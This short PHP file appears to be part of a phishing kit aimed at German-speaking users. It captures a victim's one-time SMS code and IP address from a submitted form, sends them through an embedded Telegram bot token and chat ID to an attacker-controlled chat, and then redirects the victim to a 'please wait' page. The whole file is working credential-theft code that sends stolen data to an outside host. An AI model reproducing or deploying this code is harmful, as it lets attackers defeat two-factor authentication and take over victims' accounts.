<?php
$ip = getenv("REMOTE_ADDR");
$message .= "---OTP SMS---\n";
$message .= "OTP   : ".$_POST['SMS']."\n";
$message .= "-------------------\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------------------------------------------\n";


        // Define your bot tokens
        file_get_contents("https://api.telegram.org/bot8230036797:AAEn7vvHrk5SF628aV7IfxBm2dujlmF-tPo/sendMessage?chat_id=-4857187582&text=" . urlencode($message)."" );


header("Location: ../Bitte/Warten-2.php");

?>
